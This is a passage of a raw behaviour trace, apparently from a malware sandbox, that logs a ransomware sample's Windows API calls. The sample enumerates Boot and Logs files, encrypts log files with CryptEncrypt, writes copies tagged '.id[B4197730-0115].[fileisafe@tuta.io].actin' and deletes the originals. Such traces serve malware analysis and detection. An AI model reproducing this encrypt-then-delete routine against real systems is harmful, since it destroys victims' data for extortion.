"c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.561] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.561] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.561] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=78688) returned 1 [0059.561] CloseHandle (hObject=0x314) returned 1 [0059.561] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0059.561] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.561] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.562] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.562] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.562] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=45976) returned 1 [0059.562] CloseHandle (hObject=0x314) returned 1 [0059.562] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui")) returned 0x20 [0059.562] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.562] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.562] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.562] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.562] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=77144) returned 1 [0059.562] CloseHandle (hObject=0x314) returned 1 [0059.562] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0059.563] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.563] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.563] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.563] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.563] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=45472) returned 1 [0059.563] CloseHandle (hObject=0x314) returned 1 [0059.563] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui")) returned 0x20 [0059.563] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\it-it\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.563] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.563] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.563] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.563] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=67424) returned 1 [0059.563] CloseHandle (hObject=0x314) returned 1 [0059.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0059.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.564] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.564] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.564] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.564] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=42904) returned 1 [0059.564] CloseHandle (hObject=0x314) returned 1 [0059.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui")) returned 0x20 [0059.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.564] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.564] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.564] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.565] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=66912) returned 1 [0059.565] CloseHandle (hObject=0x314) returned 1 [0059.565] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0059.565] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.565] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.565] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.565] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.565] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=42912) returned 1 [0059.565] CloseHandle (hObject=0x314) returned 1 [0059.565] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui")) returned 0x20 [0059.565] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.565] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.566] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.566] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.566] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=75616) returned 1 [0059.566] CloseHandle (hObject=0x314) returned 1 [0059.566] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui")) returned 0x20 [0059.566] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\lt-LT\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.566] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.566] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.566] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.566] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=75608) returned 1 [0059.566] CloseHandle (hObject=0x314) returned 1 [0059.566] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui")) returned 0x20 [0059.566] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\lv-LV\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.567] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.567] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.567] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.567] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=811936) returned 1 [0059.567] CloseHandle (hObject=0x314) returned 1 [0059.567] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe")) returned 0x20 [0059.567] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\memtest.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.567] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.567] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0059.567] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0059.567] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=75616) returned 1 [0059.567] CloseHandle (hObject=0x314) returned 1 [0059.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui")) returned 0x20 [0059.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0060.117] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0060.117] SetEvent (hEvent=0x2e8) returned 1 [0060.117] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0060.117] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0060.118] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0060.118] CloseHandle (hObject=0x324) returned 1 [0060.118] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx")) returned 0x20 [0060.118] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\hardwareevents.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0060.118] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0060.119] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0060.119] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0060.119] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\hardwareevents.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0060.119] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72080) returned 1 [0060.119] CryptSetKeyParam (hKey=0xf72080, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0060.119] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0060.121] CryptEncrypt (in: hKey=0xf72080, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0060.121] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0060.123] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b00) returned 1 [0060.123] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0060.123] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0060.123] CryptDestroyKey (hKey=0xf71b00) returned 1 [0060.123] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0060.123] CryptDestroyKey (hKey=0xf72080) returned 1 [0060.123] CloseHandle (hObject=0x324) returned 1 [0060.123] CloseHandle (hObject=0x300) returned 1 [0060.125] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx")) returned 1 [0060.126] SetEvent (hEvent=0x2e8) returned 1 [0060.126] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0060.127] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0060.127] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0060.127] CloseHandle (hObject=0x300) returned 1 [0060.127] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx")) returned 0x20 [0060.127] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\internet explorer.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0060.127] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0060.127] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0060.127] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0060.127] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\internet explorer.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0060.139] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71f40) returned 1 [0060.139] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0060.139] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0060.140] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0060.140] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0060.142] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71d40) returned 1 [0060.142] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0060.142] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0060.142] CryptDestroyKey (hKey=0xf71d40) returned 1 [0060.142] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0060.142] CryptDestroyKey (hKey=0xf71f40) returned 1 [0060.142] CloseHandle (hObject=0x300) returned 1 [0060.142] CloseHandle (hObject=0x324) returned 1 [0060.144] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx")) returned 1 [0060.146] SetEvent (hEvent=0x2e8) returned 1 [0060.146] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0060.146] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0060.146] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0060.146] CloseHandle (hObject=0x324) returned 1 [0060.146] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx")) returned 0x20 [0060.146] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\key management service.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0060.147] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0060.147] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0060.147] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 